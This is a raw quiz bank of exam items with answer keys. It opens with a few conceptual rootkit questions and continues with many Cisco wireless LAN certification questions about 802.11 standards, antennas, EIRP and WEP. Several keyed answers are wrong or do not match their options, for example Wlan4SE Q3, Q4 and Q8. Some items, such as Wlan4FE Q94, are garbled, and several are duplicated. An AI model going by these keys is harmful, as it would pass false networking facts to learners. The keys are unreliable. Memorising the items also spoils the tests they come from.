D#Rootkits Q16: How can you communicate with a rootkit?	A^: just start SSHD	^B: the rootkit creates a listnerprogram	^C: commands are received by ICMP	^D: kernel rootkit have to modify some system calls.
sys_execve()#Rootkits Q17: To Redirect File execution the kernel rootkit can replace the:________ Thus, whenever the system tries to execute the "login" program, it will be re-directed to execute the attacker's version of login program.
Host Hardening, Systems patch and update#Q18Rootkits Q18: What is the best defense against rootkits? ____ _______, ______ ______ and ________ 
B	#Wlan4FE Q2 Which 802.11 standard is also referred to as Wi-Fi?		^A: 802.11a		^B: 802.11b		^C: 802.11c		^D: 802.11d		^E: 802.11e		
A	#Wlan4FE Q3 802.11a uses which of the following (Choose all that apply.)		^A: orthogonal frequency division multiplexing		^B: 2.4 GHz band..		^C: FHSS		^D: DSSS				
B,D	#Wlan4FE Q4 How can you send more data across the airwaves? (Choose two.)		^A: utilize lower band frequencies		^B: use more complex modulation		^C: use better filtering on the receiver		^D: use more frequency (wider bandwidth)				
2.4	#Wlan4FE Q5 802.11 works at the _________GHz band.												
infrastructure	#Wlan4FE Q6 The 802.11 networking framework in which devices communicate with each other byfirst going throuogh an Access Point is known as ______________ mode.												
A,D	#Wlan4FE Q7 802.11b uses which of the following (Choose all that apply.)		^A: DSSS		^B: FHSS		^C: orthogonal frequency division multiplexing		^D: 2.4 GHz band				
frequency hopping spread spectrum	#Wlan4FE Q8 What does FHSS stand for?												
milliwatt	#Wlan4FE Q9 The designator dBm is a decibel referenced to a(n) _________.												
B	#Wlan4FE Q10 802.11 provides _________ Mbps transmission.		^A: 10		^B: 1 or 2		^C: 15		^D: 1 only		^E: 2 only		
B	#Wlan4FE Q11 Ad-hoc mode is also referred to as _________ mode.		^A: central		^B: peerpeer		^C: client server		^D: secured				
1	#Wlan4FE Q12 The value 0 dBm is equivalent to how many milliwatts?												
direct sequence spread spectrum	#Wlan4FE Q13 What does DSSS stand for?												
A	#Wlan4FE Q14 What acts as a communication hub for users of a wireless device to connect to a wiredLAN?		^A: AP		^B: CSD		^C: ISSS		^D: DSS				
5.2	#Wlan4FE Q15 If an antenna is rated at 3 dBd, what is its rating in dBi?												
F	#Wlan4FE Q16 802.11a provides ________ Mbps transmission.		^A: 1 or 2		^B: 1 only		^C: 15		^D: 2 only		^E: 10		^F: 54
C	#Wlan4FE Q17 With Ad-Hoc mode you do not need to use an AP.		^A: False		^B: This is not always true  must be judged case by case		^C: True						
dipole	#Wlan4FE Q18 The designator dBd is a decibel referenced to a(n) __________.												
D	#Wlan4FE Q19 You have a two cell configuration. One cell's Access Point is configured utilizing channel6.What is the best channel selection for the second cell's Access Point?		^A: Channel 4		^B: Channel 8		^C: Channel 9		^D: Channel 11				
extended	#Wlan4FE Q20 A/an _________ Service Set is asset of two or more BSSs that form a single subnetwork.												
30.15	#Wlan4FE Q21 Your radio transmits at 20 dBm and you are using a 13.5 dBi Yagi with 50 feet cabling.The cabling has a loss of 6.7 dB per 100 feet.What is your EIRP in dB?												
E,F	#Wlan4FE Q22 What components must be configured to enable World mode in a WLAN system?(Choose two.)		^A: Cisco router		^B: Cisco switch		^C: non-Cisco router		^D: non-Cisco switch		^E: Cisco Access Point		^F: Cisco wireless client
radio frequency	#Wlan4FE Q23 What is RF a shorthand for?												
D	#Wlan4FE Q24 EIRP is a measurement of power from an RF system (transmitter, cabling, andantenna).Where is the measurement made?		^A: output of cabling		^B: output of the radio		^C: input of the antenna		^D: output of the antenna				
C,D	#Wlan4FE Q25 The 350 series Access Points programmed with U.S. channel sets have the option toreduce the power output to control the area of coverage. The power settings are 100mW, 50 mW, 30 mW, 20 mW, 5 mW, and 1 mW.How does this allow the Access Points to be very scalable? (Choose two.)		^A: The receiver sensitivity decreases.		^B: The receiver sensitivity increases.		^C: You can create smaller coverage patterns.		^D: While covering the same floor, you can increase the ratio of Access Points to clientswhen it is set at 1 mW rather than 100mW.				
basic	#Wlan4FE Q26 When one AP is connect to a wired network and a set of wireless stations it is referred toas a/an __________ Service Set.												
A,B	#Wlan4FE Q27 What could happen if water seeps into the connectors of the antenna cabling used toconnect the antenna to the radio device? (Choose two.)		^A: The interior of the cable could corrode.		^B: The cabling could exhibit additional loss.		^C: Nothing happens because the center conductor is solid.		^D: Nothing happens because the outside jacket of the cabling is weatherproof.		^E: The cable could be more prone to static electric discharge from lightning strikes,making it more imperative that a lightning arrestor be used.		
A,D	#Wlan4FE Q28 How does a Workgroup Bridge (WGB) connect to Ethernet devices? (Choose two.)		^A: Ethernet patch cable to a hub		^B: Ethernet crossover cable to a hub		^C: Ethernet patch cable to a single device		^D: Ethernet crossover cable to a single device				
B	#Wlan4FE Q29 Network managers are using WLANs to facilitate:		^A: security		^B: network moves		^C: cost savings		^D: performance tuning				
C	#Wlan4FE Q30 A customer has a current site with an omni-directional antenna. It has 50 ft. of cablingthat they are increasing to 100 ft.This change in cabling could _________.		^A: increase the data rate		^B: increase the coverage area		^C: decrease the coverage area		^D: decrease the angle of radiation from the antenna				
B,C	#Wlan4FE Q31 A Cisco Workgroup Bridge (WGB) can associate to _________. (Choose two.)		^A: another Cisco WGB		^B: a Cisco Aironet Access Point		^C: a Cisco Aironet wireless bridge		^D: a non-Cisco 802.11b compliant Access Point				
A	#Wlan4FE Q32 Most corporate wireless LANs operate in ___________ mode.		^A: Infrastructure		^B: Basic		^C: Extended		^D: Ad-hoc				
A	#Wlan4FE Q33 The frequencies that an antenna is tuned for is referred to as the antenna's __________.		^A: bandwidth		^B: beamwidth		^C: Fresnel range		^D: frequency seperation				
B,D	#Wlan4FE Q34 In adhoc mode, the Cisco Aironet wireless PCMCIA client can talk to which twodevices? (Choose two.)		^A: Cisco Aironet Access Points		^B: Cisco Aironet PCI wireless adaptor		^C: Cisco Aironet Workgroup Bridge (WGB)		^D: Cisco Aironet PCMCIA wireless adaptor
802.11b	#Wlan4FE Q35 All Cisco Aironet 350 Series client adapters are IEEE __________ compliant.								
B,C	#Wlan4FE Q36 What happens to an antenna's radiation pattern as the gain of the antenna increases?(Choose two.)		^A: The angle of radiation increases.		^B: The angle of radiation decreases.		^C: The coverage distance from the antenna increases.		^D: The coverage distance from the antenna decreases.
C,D	#Wlan4FE Q37 The PCM352 has two LEDs. What indicates that the card is working properly (notnecessarily associated)? (Choose two.)		"^A: green LED off; amber LED solid"		"^B: green LED off; amber LED blink sporadically"		"^C: green LED blinking fast; amber LED blinking sporadically"		"^D: green LED blinking slowly; amber LED blinking sporadically"
SSID	#Wlan4FE Q38 What is the common network name for the devices in a WLAN subsystem?								
B,C	#Wlan4FE Q39 Which two antennas radiate in a 360 degree pattern (as viewed from the top)? (Choosetwo.)		^A: Yagi		^B: omni		^C: dipole		^D: patch
B	#Wlan4FE Q40 What is the total maximum length of Ethernet cabling that can be used when poweringthe 350 series Access point?		^A: 50 meters		^B: 100 meters		^C: 300 meters		^D: no limit
B	#Wlan4FE Q41 With a WLAN, any WLAN client within an access point service area can receive datatransmitted to or from the access point.		^A: This is not always true  must be judged case by case		^B: True		^C: False		
C	#Wlan4FE Q42 You are trying to provide coverage down a long hallway with your antenna at the end ofthe hallway. Which antenna should you use?		^A: 12 dBi omni		^B: 5.2 dBi omni		^C: 8.5 dBi patch		^D: 2.14 dBi dipole
D	#Wlan4FE Q43 What DC voltage is used to power the Access Points through the use of in-line power tothe Ethernet port?		^A: -5 VDC		^B: -9 VDC		^C: -12 VDC		^D: -48 VDC
A	#Wlan4FE Q44 AirSnort is a tool for .		^A: breaking the WEP key		^B: tuning the WLAN		^C: site backup		^D: site surveying
B	#Wlan4FE Q45 The 2.4 GHz 6 dBi patch antenna has what vertical beamwidth?		^A: 21.5 degrees		^B: 65 degrees		^C: 85 degrees		^D: 170 degrees
A	#Wlan4FE Q46 In Cisco's server-based authentication security scheme, what device is used as thesupplicant of the system?		^A: client		^B: switch		^C: Access Point		^D: authentication server
D	#Wlan4FE Q47 ________ is the amount of time it takes a radio to change from one channel to a differentchannel.		^A: Hop Sequence		^B: Dwell Time		^C: Dwell Frequency		^D: Hop Time
A	#Wlan4FE Q48 A customer wants to have coverage in a square courtyard that is surrounded bybuildings. There is no roof access for an antenna and it needs to be placed on the side ofone of the buildings.Which antenna should you recommend for this application?		^A: 6 dBi patch		^B: 12 dBi omni		^C: 13.5 dBi Yagi		^D: 2.14 dBi dipole
C	#Wlan4FE Q49 Which component of a WLAN is used to radiate the RF signal to create the cellstructure?		^A: radio		^B: client		^C: antenna		^D: Access Point
C	#Wlan4FE Q50 The 802.11 standard supports which two means of client authentication?		^A: aggregated and shared-key authentication		^B: closed and shared-key authentication		^C: open and shared-key authentication				
D	#Wlan4FE Q51 The most common occurrence of multipath interference comes from __________.		^A: a pointpoint bridge link		^B: in-building open air coverage		^C: a pointmultipoint bridge link		^D: in-building cluttered environment		
B	#Wlan4FE Q52 How do Cisco/Aironet 802.11b radios perform their transmissions?		^A: full duplex		^B: half duplex		^C: single side-band		^D: depends upon data rate		
A,B	#Wlan4FE Q53 Cisco Aironet 350 Series Client Adapters are available in what formats? (Choose all thatapply.)		^A: PCI		^B: PCMCIA		^C: ISA		^D: VESA		
C	#Wlan4FE Q54 What happens when a tree or other foliage is in the direct path between the transmitterand receiver of a 2.4 GHz signal?		^A: The signal is reflected		^B: The signal is refracted		^C: The signal is absorbed		^D: The signal is diffracted		
D	#Wlan4FE Q55 In 802.11, how does a client use a null value for their SSID and still associate to anAccess Point?		^A: through the use of LEAP		^B: through open authentication		^C: through shared-key operation		^D: through the use of a Broadcast SSID		^E: by the use of a null character in the Access Point's SSID field
B	#Wlan4FE Q56 If a device that uses static WEP keys is lost or stolen, the possessor of the stolen devicecan access the WLAN.		^A: This is not always true  must be judged case by case		^B: True		^C: False				
B	#Wlan4FE Q57 Which specific antenna architecture is used to help eliminate RF null areas of coverage?		^A: splitters		^B: diversity		^C: high gain omni		^D: patch antennas		
A,D	#Wlan4FE Q58 What can you do to resolve RF noise issues within the 802.11b cell structure? (Choosetwo.)		^A: use a directional antenna when possible		^B: use a diversity antenna on the Access Point		^C: use an amplifier in-line to overcome the noise		^D: change the channel on which the Access Point is configured		
DSSS	#Wlan4FE Q59 The wireless medium of Cisco Aironet 350 Series Client Adapter is?										
A,B	#Wlan4FE Q60 There are two antenna connectors on the Cisco Aironet Access Points. What are tworeasons antennas are used on both ports? (Choose two.)		^A: to help eliminate null zones		^B: to use two antennas for diversity to overcome multipath distortion		^C: to allow for full-duplex operation of the radio (one antenna for transmit and one forreceive)		^D: to reduce the number of Access Points needed in an area by using directional antennasaimed in two different directions		
B,D,E	#Wlan4FE Q61 When doing a survey in a hospital application, which three should you consider?(Choose three.)		^A: pagers		^B: fire doors		^C: televisions		^D: microwave ovens		^E: radiology/X-ray areas
CSMA/CA	#Wlan4FE Q62 What media access protocol does the Cisco Aironet 350 Series Client Adapter use?										
D	#Wlan4FE Q63 What is the maximum EIRP of a 2.4 GHz RF system for use in an ETSI regulatedcountry?		^A: 1 W		^B: 4 W		^C: 50 mW		^D: 100 mW		^E: 250 mW
A	#Wlan4FE Q64 Under the 802.11b standard, what modulation is used when transmitting data at 11Mbps?		^A: CCK		^B: QAM		^C: BPSK		^D: QPSK		
B	#Wlan4FE Q65 All Cisco wireless client adapters include the Cisco Aironet Client Utility for.		^A: antenna adjustment		^B: adapter configuration		^C: site backup				
D	#Wlan4FE Q66 ________ is the amount of time it takes a radio to change from one channel to a differentchannel.		^A: Hop Sequence		^B: Dwell Time		^C: Dwell Frequency		^D: Hop Time		
B,D	#Wlan4FE Q67 How can you send more data across the airwaves? (Choose two.)		^A: utilize lower band frequencies		^B: use more complex modulation		^C: use better filtering on the receiver		^D: use more frequency (wider bandwidth)		
WECA	#Wlan4FE Q68 The Wi-Fi alliance was formerly known as?										
B	#Wlan4FE Q69 What is the total bandwidth of the 2.4 GHz ISM band?		^A: 70 MHz		^B: 83.5 MHz		^C: 90 MHz		^D: 100 MHz		
hopping	#Wlan4FE Q70 With FHSS, the transmission frequencies are determined by a ________ code.										
A,B	#Wlan4FE Q71 The Cisco Aironet 1200 Series is compliant with what IEEE standards? (Choose all thatapply.)		^A: 802.11a		^B: 802.11b		^C: 802.11x		^D: 802.11g		^E: 802.11c
C	#Wlan4FE Q72 An 802.11b radio utilizes how much of the 2.4 GHz ISM band for transmission?		^A: 1 MHz		^B: 11 MHz		^C: 22 MHz		^D: 83.5 MHz		
A	#Wlan4FE Q73 Cisco Aironet 1200 Series allows for both singleband configuration.		^A: True		^B: False		^C: This is not always true  must be judged case by case				
B	#Wlan4FE Q74 With DSS, chipping code divides the user data according to a.		^A: output parameter		^B: spreading ratio		^C: input parameter		^D: user rate		
E	#Wlan4FE Q75 How many 2.4 GHz RF channels for DSSS are available in Japan?		^A: 2		^B: 9		^C: 11		^D: 13		^E: 14
Cisco LEAP	#Wlan4FE Q76 Cisco has developed an 802.1X authentication type called EAP Cisco Wireless, which isalso known as?										
DSSS	#Wlan4FE Q77 _______ is a transmission technology used in WLAN transmissions where data signal atthe sending station is combined with chipping code that divides the user data accordingto a spreading ratio.										
C	#Wlan4FE Q78 After June 1994, FCC and DOC regulations require all antenna connectors to beproprietary (unique and non-standard).Cisco/Aironet has since used what connector on its Access Points and bridges?		^A: BNC		^B: RP-SMA		^C: RP-TNC		^D: N-connector		
75	#Wlan4FE Q79 Current FCC regulations require WLAN product manufacturers to use _____ or morefrequencies per transmission channel.										
D	#Wlan4FE Q80 With FHSS, data signal is modulated with a ___________ carrier signal.		^A: zeroband		^B: broadband		^C: neutralband		^D: narrowband		
A	#Wlan4FE Q81 In the United States, what is the maximum EIRP that is allowed in a 5 GHz UNII-1 RFsystem?		^A: 250 mW		^B: 500 mW		^C: 1 W		^D: 4 W		
Wi-Fi	#Wlan4FE Q82 An organization made up of leading wireless equipment and software providers withmissions of certifying all 802.11-based products for interoperability is known as the____________ alliance.												
C,F	#Wlan4FE Q83 Which 5 GHz bands in the United States are designated for outdoor use only? (Choosetwo.)		^A: UNII-1		^B: UNII-2		^C: UNII-3		^D: 5.15-5.25 GHz		^E: 5.25-5.35 GHz		^F: 5.725-5.825 GHz
C	#Wlan4FE Q84 According to FCC regulations, the maximum power output of a 2.4 GHz radio is _____.		^A: 17 dBm		^B: 20 dBm		^C: 30 dBm		^D: 36 dBm				
5	#Wlan4FE Q85 802.11a works at the _________ GHz band?												
C,D	#Wlan4FE Q86 Which two types of packets are able to get through prior to a client being authenticatedwith server-based authentication? (Choose two)		^A: Data packets		^B: DHCP packets		^C: EAP authentication packets		^D: 802.11 open authentication packets				
A,B,C	#Wlan4FE Q88 Filtering can be performed on an Access Point at which three layers of the OSI model?(Choose three)		^A: Layer 2		^B: Layer 3		^C: Layer 4		^D: Layer 5				
B	#Wlan4FE Q89 What information is needed when using the IP Setup Utility (IPSU) to determine the IPaddress of a specific Access Point?		^A: DNS name of the Access Point		^B: MAC address of the Access Point		^C: Serial number of the Access Point		^D: The switch and switch port it is attached to				
C	#Wlan4FE Q90 When configuring the Cisco Secure ACS server for use with WLANs, the NetworkAccess Server is _______.		^A: The ACS servers IP address		^B: The ACS servers DNS name		^C: Individual Access Points on the network		^D: The master Access Point on the network				
D	#Wlan4FE Q91 How many different WEP keys will the client be aware of in each cell using Ciscosserver-based authentication method?		^A: 1		^B: 2		^C: 3		^D: 4				
B	#Wlan4FE Q92 When deploying Access Points in hot-standby mode, which channel is used by thestandby Access Point?		^A: It scans all available channels.		^B: It uses the same channel as the primary Access Point.		^C: It uses a channel adjacent to the primary Access Point.		^D: The radio is off until an SNMP trap is sent by the primary.				
A,C	#Wlan4FE Q93 The IP Setup Utility (IPSU) can be used to configure which two Access Pointparameters? (Choose two)		^A: SSID		^B: User name		^C: IP address		^D: RF channel				
C	#Wlan4FE Q94 Exhibit:You have a wireless LAN that you want to set up to only pass traffic from one client tothe R		^F: You have decided to set up a filter.What do you need to set up on the two exhibits?		"^A: Address Filter pag^E: Allowed; Access Point Radio Advanced pag^E: Allowed"		"^B: Address Filter pag^E: Disallowed; Access Point Radio Advanced pag^E: Allowed"		"^C: Address Filter pag^E: Allowed; Access Point Radio Advanced pag^E: Disallowed"		"^D: Address Filter pag^E: Disallowed; Access Point Radio Advanced pag^E: Disallowed"		
C	#Wlan4FE Q95 You are using the Message Integrity Check (MIC) feature for enhancing security.Where is the additional MIC information placed in the 802.11 packets?		^A: Trailer		^B: Header		^C: Data portion (payload)		^D: Initialization Vector (IV)				
B	#Wlan4FE Q96 You client is configured in the following way:SSID1 = 1234Encryption Key 1 = 0123456789Authentication Type = OpenWhich Access Point configuration will work with your client?		^A: SSID = 1234, Encryption Key 1 = 1234567890, Authentication Type = Open		^B: SSID = 1234, Encryption Key 1 = 0123456789. Authentication Type = Open		^C: SSID = 1234a, Encryption Key 1 = 0123456789, Authentication Type = Open		^D: SSID = 1234, Encryption Key 1 = 0123456789, Authentication Type = Shared Key				
B,C	#Wlan4FE Q97 Which two can be used to access the CLI screens on an Access Point? (Choose two)		^A: IPSU		^B: Console port		^C: Telnet session		^D: Browser window				
C	#Wlan4FE Q98 When using 128-bit data encryption, how many bits is the Initialization Vector (IV)?		^A: 4-bits		^B: 16-bits		^C: 24-bits		^D: 48-bits
A	#Wlan4FE Q99 An Access Point set up as a repeater will pass data traffic through which port?		^A: Radio port		^B: Bridge port		^C: Console port		^D: Ethernet port
C	#Wlan4FE Q100 When using omni-directional antennas, which is the best and most systematic way toconduct a site survey?		^A: Use 2.412 GHz when surveying.		^B: Perform a two dimensional survey.		^C: Start from every corner of the floor and move inward		^D: Start from the middle of the floor and go to every corner of the floor.
A	#Wlan4FE Q102 Access Point10 in root mode (SSID = 123) provide connection to repeater AccessPoint20 (SSID = 123).If Access Point10 is using Channel 1, what channel will Access Point20 use?		^A: Channel 1		^B: Channel 6		^C: Any channel except Channel 1.		^D: Channel is not a concern in this application.
C	#Wlan4FE Q103 A customer wants to make a wireless bridge link, which is 20 km distant wireless link inEurope with BR350s.Which statement is true?		^A: This cannot be done.		^B: The customer must use 21 dBi dish antennas and an amplifier.		^C: It cannot be done without the use of a repeater site and four bridges.		^D: If the customer uses 6 dBi patch antennas there should be no problem.
B	#Wlan4FE Q104 The elliptical immediately surrounding the visual path of an RF signal is often referredto as ________.		^A: Line of sight		^B: The Fresnel zone		^C: Free space path loss		^D: Atmospheric absorption
B	#Wlan4FE Q105 You are installing two new, factory default BR352s.What must you do for them to be bale to pass traffic?		^A: Set the Ethernet port to active.		^B: Set the Root to off on the remote bridge.		^C: You do nothing.They will communicate with default settings.		^D: Set the frequency of the remote bridge to match the master bridge frequency.
D	#Wlan4FE Q106 The center LED (status) flashes amber on a Cisco Aironet wireless bridge.Which statement is true?		^A: A beacon packet is transmitted.		^B: It is the light sequence of the Find utility.		^C: An association from a client is established.		^D: An error occurred and was written in the log.
B,C	#Wlan4FE Q107 What are two appropriate methods for increasing the distance that two bridges cancommunicate? (Choose two)		^A: Disable WEP.		^B: Lower the data rate transmission.		^C: Use an antenna with a decreased beam width.		^D: Use an antenna with an increased beam width.
C	#Wlan4FE Q108 The most efficient and effective method of sealing the connectors exposed to theenvironment is to use ________.		^A: RTV		^B: Duct tape		^C: COAX-SEAL		^D: Electrical tape
A	#Wlan4FE Q109 If a root Access Point is set at channel 6, what channel will a repeater Access Point use toassociate to it?		^A: Channel 6		^B: Any channel		^C: Any other non-overlapping channel		^D: It depends on the SSID
A,C	#Wlan4FE Q110 What are two functions of a lightning arrestor that is used in conjunction with CiscoAironet wireless bridges?		^A: Dissipates any energy from a near lightning strike.		^B: Dissipates all the energy from a direct lightning strike.		^C: Bleeds of static discharges to help prevent a direct lightning strike.		^D: Adds attenuation to the signal and separates data from the lightning strikes enegry.
B	#Wlan4FE Q111 Two buildings have a Cisco Aironet Access Point installed at each site connecting to theEthernet LAN in each building. There is a 21 dBi dish antenna using 20 ft. cabling ineach building and the antennas are aimed at each other. The buildings are one mileapart with clean line of sight. There is no network connection between the two networks.What is a potential problem?		^A: The root parameters have not been set properly.		^B: Access Points cannot be used for this mode of operation.		^C: The dish antennas are too high of gain for the 1 mile distance.		^D: The cables are too long for this distance/antenna combination.
B	#Wlan4FE Q112 How far is typical line of site, without the use of towers, buildings, etc?		^A: 2 miles		^B: 6 miles		^C: 18 miles		^D: 24 miles
A	#Wlan4FE Q113 You need to run 150 ft. coaxes on both ends of a pointpoint bridge link in the U.S.with BR350s. You decide to utilize LMR-600, which has a loss of 4.4 db/100 feet.What is the EIRP of the system if running at 11 Mb with the Aironent 21 dBi dishantennas?		^A: 34.4 dBm		^B: 36.2 dBm		^C: 45.3 dBm		^D: 47.6 dBm
B,C,D	#Wlan4FE Q114 Which three methods are used to determine the direction in which to align the antennas?(Choose three)		^A: Cellular triangulation		^B: Balloon and binoculars		^C: Stroke light and binoculars		^D: Global Positioning System (GPS)
B	#Wlan4FE Q115 TestKing.com, a customer, has an installed 4-mile wireless link using Cisco Aironetwireless bridges in the U.S. It us currently running at 2 Mb, with 13.5 Yagi antennas(vertically polarized), and 50 ft. of Cisco cabling on each side. The customer now needsthe wireless pipe to be increased by 11 Mb. The cabling cannot be shortened due tophysical limitations.What can be done to make this a solid 11 Mb pipe?		^A: Utilize an amplifier on each site.		^B: Replace the Yagis with dish antennas.		^C: Rotate the antennas 90 degrees and use horizontal polarization.		^D: Increase the power output of the radios using firmware 10.10T or greater.		
D	#Wlan4FE Q116 How many authentication servers can be configured on the Access Point?		^A: 1		^B: 2		^C: 3		^D: 4		
C,D	#Wlan4FE Q117 You are setting up a user through User Manager on the Access Point menu screen.Which two rights does that user require if it is an SNMP community with read-onlyprivileges? (Choose two)		^A: Ident		^B: Write		^C: SNMP		^D: Admin		^E: Firmware
A	#Wlan4FE Q118 Which statement is true about Ciscos server-based authentication process?		^A: It is mutual authentication between server and client.		^B: The authentication method is one way (client to server).		^C: The authentication method is one way (server to client).		^D: The authentication method is dependent upon which 802.11 authentication method isused (open vs. shared key).
B#Wlan4SE Q 1. 802.11 works at the 900 Mhz band.	^A. True	^B. False	^C. This is not always true  must be judge case by case.
B#Wlan4SE Q 2. The maximum transmission speed of 802.11 is _______ Mbps.	^A. 1	^B. 2	^C. 15	^D. 10
A#Wlan4SE Q 3. In ad-hoc mode, what acts as a communication hub for users of a wireless device to connect to a wired LAN?	^A. DSS	^B. ISSS	^C. CSD	^D. AP
B#Wlan4SE Q 4. Which 802.11 standard is also referred to as 802.11 High rate?	^A. 802.1x	^B. 802.11a	^C. 802.11b
A#Wlan4SE Q 5. 802.11 can make use of direct sequence spread spectrum only when running at the 5 Ghz band.	^A. False	^B. True	^C. This is not always true  must be judge case by case.
A#Wlan4SE Q 6. Ad-hoc mode is generally good for small group of informal use.	^A. True	^B. This is not always true  must be judged case by case	^C. False
A,B#Wlan4SE Q 7. What differentiates the FCC and ETSI regulations pertaining to 802.11b Wireless LANs? (Choose two.)	^A. power output of the radio	^B. number of defined channels	^C. number of clients allowed per Access Point	^D. type of antenna connector used on Access Points
A#Wlan4SE Q 8. 802.11b supports the use of orthogonal frequency division multiplexing at which band?	^A. 5 GHz	^B. 2.4 GHz	^C. 900MHz	^D. 1.2 GHz
B#Wlan4SE Q 9. All Cisco Aironet 350 Series client adapters are IEEE 802.11g compliant.	^A. True	^B. False
B#Wlan4SE Q 10. With Ad-Hoc mode, an AP is:	^A. needed	^B. not needed	^C. This is hard to say  must be judged case by case.
C#Wlan4SE Q 11. In infrastructure mode, devices communicate with each other MUST first go through an Access Point.	^A. This is not always true  must be judged case by case	^B. False	^C. True
D#Wlan4SE Q 12. If the power output of a radio is equal to 100 mW, what is its equivalent rating in dBm?	^A. 5dBm	^B. 10 dBm	^C. 15 dBm	^D. 20 dBm
A#Wlan4SE Q 13. Cisco LEAP is also known as:	^A. EAP Cisco Wireless	^B. Aironet Secure	^C. Cisco Secure Works	^D. Cisco Dial-in User Service
Extended Service Set #Wlan4SE Q 14. What does ESS stand for?
D#Wlan4SE Q 15. An 802.11a radio utilizes what technique to transmit its signal?	^A. IR	^B. DSSS	^C. FHSS	^D. OFDM
Basic Service Set #Wlan4SE Q 17. What does BSS stand for?
isotropic #18. The designator dBi is a decibel referenced to a(an) _________ radiator.
D#Wlan4SE Q 19. 802.11a has a max throughput of ________ Mbps transmission.	^A. 2 	^B. 11	^C. 2.4	^D. 54
D#Wlan4SE Q 20. Most small informal wireless LANs operate in _________ mode.	^A. Extended	^B. Basic	^C. Infrastructure	^D. Ad-hoc
B#Wlan4SE Q 21An antenna is rated at 0 dB^D. What is its rating in dBi?	^A. 1	^B. 2.14	^C. 3.1	^D. 3.6
A#Wlan4SE Q 22. 802.11 supports the use of frequency hopping spread spectrum.	^A. True	^B. This is not always true  must be judged case by case	^C. False
C#Wlan4SE Q 23. Network managers are using WLANs due to the need for:	^A. security	^B. performance	^C. flexibility	^D. cost savings
B#Wlan4SE Q 24. What is EIRP?	^A. Effective Intermittent Radio Power	^B. Effective Isotropic Radiated Power	^C. Elevated Intermittent Radiated Power	^D. Effective Inernational Radiated Power
A#Wlan4SE Q 25. What is necessary to determine the placement of the individual Access Points?	^A. site survey	^B. program analysis	^C. hop count to gateway	^D. Nothing needs to be done if fewer than 11 Access Points are used.
A#Wlan4SE Q 26. Most wireless LAN technologies in use today are based on RF field propagation.	^A. True	^B. False	^C. This is not always true  must be judged case by case
A,B,C#Wlan4SE Q 27. Which three variables directly affect the EIRP value of an RF system (Choose three.)	^A. power of radio	^B. gain of antenna	^C. length of cabling	^D. receiver sensitivity of radio
B#Wlan4SE Q 28. There are 11 channels defined within the North American Direct Sequence channel set. How many of these channels do not overlap?	^A. 2	^B. 3
B#Wlan4SE Q 29. The 802.11 standard supports open and shared-key authentication when RADIUS is configured properly.	^A. True	^B. False	^C. This is not always true  must be judged case by case
A,D#Wlan4SE Q 30. Installing antenna extension cable decreases ________- (Choose two.)	^A. the coverage distance	^B. the antenna's bandwidth	^C. the antenna's angle of radiation	^D. effective isotropic radiated power
B#Wlan4SE Q 31. A customer wants a LAN inside their historical building for administration purposes and for selling souvenirs. ^  They are unable to run Ethernet due to the fact the building cannot be marred in any way. ^   You recommend a wireless LAN but when doing your site survey you find that one will not cover the whole building. ^ What is your recommendation?	^A. use a diversity antenna system for better coverage	^B. use a wireless repeater to help cover the other areas	^C. place an ampliefier on the Access Point for more power	^D. increase the power output of the radio with version 10.10T (or greater) of the Access Point firmware.
A#Wlan4SE Q 32. An SSID prevents access by any client device that does not have the SDID.	^A. True	^B. False	^C. This is not always true  must be judged case by case
C#Wlan4SE Q 33. A customer has a current site with an omni-directional antenn^A. It has 50 ft. of cabling that they are increasing to 100 ft.	^  This change in cabling could ________.	^A. increase the data rate	^B. increase the coverage area	^C. decrease the coverage area	^D. decrease the angle of radiation from the antenna
C,D#Wlan4SE Q 34. The 350 series Access Points programmed with U.S. channel sets have the option to reduce the power output to control the area of coverage. ^  The power settings are 100mW, 50 mW, 30 mW, 20 mW, 5 mW, and 1 mW. ^  How does this allow the Access Points to be very scalable? (Choose two.)	^A. The receiver sensitivity decreases.	^B. The receiver sensitivity increases.	^C. You can create smaller coverage patterns.	^D. While covering the same floor, you can increase the ratio of Access Points to clients when it is set at 1 mW rather than 100mW.
B#Wlan4SE Q 35. Cisco Aironet 350 Series Client Adapters are available in what formats for notebook computers? (Choose all that apply.)	^A. PCI	^B. PCI Card	^C. ISA	^D. VISA
A#Wlan4SE Q 36. What is the increase in energy that an antenna appears to add to an RF signal?	^A. gain	^B. VSWR	^C. bandwidth	^D. polarization
C#Wlan4SE Q 37. A school has an external classroom in a trailer located next to the main school building. ^  There are six computers in the remote classroom that need to connect to the main school. ^  The main school building already has a Cisco Access Point infrastructure located within it.^ What wireless product would best connect the classroom to the main building?	^A. bridge	^B. Access Point	^C. Workgroup Bridge (WGB)	^D. wireless PCI clients in every computer
B#Wlan4SE Q 38. WEP key is _______.	^A. highly secure	^B. breakable	^C. always safe
D#Wlan4SE Q 39. What is the angle of coverage that an antenna radiates?	^A. gain	^B. diversity	^C. bandwidth	^D. beamwidth	^E. Fresnel zone
D#Wlan4SE Q 40. What is the maximum number of wired clients that can send packets through the WGB342 to an Access point?	^A. 2	^B. 4	^C. 6	^D. 8
C#Wlan4SE Q 41. With a WLAN, any WLAN client within an access point service area can receive data transmitted to or from the access as long as both devices are of the same brand.	^A. True	^B. This is hard to say  depends on the structure	^C. False
B#Wlan4SE Q 42. An omni-directional antenna that is designated to radiate at a slight angle rather than at 90 degrees from the vertical element has __________.	^A. gain	^B. downtilt	^C. beamwidth	^D. sectorization
B,C#Wlan4SE Q 43. In adhoc mode, the Cisco Aironet wireless PCMCIA client can talk to which two devices? (Choose two.)	^A. Cisco Aironet Access Points	^B. Cisco Aironet PCI wireless adaptor	^C. Cisco Aironet PCMCIA wireless adaptor	^D. Cisco Aironet Workgroup Bridge (WGB)
A#Wlan4SE Q 44. 802.11b supports the use of orthogonal frequency division multiplexing at which band?	^A. 5 GHz	^B. 2.4 GHz	^C. 900MHz	^D. 1.2 GHz
A,D#Wlan4SE Q 45. Which two statements are true when the gain of an omni-directional antenna increases? (Choose two.)	^A. The coverage distance increases.	^B. The coverage distance decreases.	^C. The coverage increases directly above and below the antenna.	^D. The coverage decreases directly above and below the antenna.
D#Wlan4SE Q 46. Which statement is true about a peer-to-peer connection (ad hoc mode)?	^A. It requires a bridge to connect two or more wireless clients.	^B. It requires an Access Point to connect two or more wireless clients.	^C. It needs both an Access Point and BR to connect the wireless clients.	^D. It allows you to connect wireless clients without the use of an Access Point or BR.
A#Wlan4SE Q 47. In general, it is not easy for an administrator to detect that an unauthorized user has infiltrated the WLAN.	^A. True	^B. This is not always true  must be judged case by case	^C. False
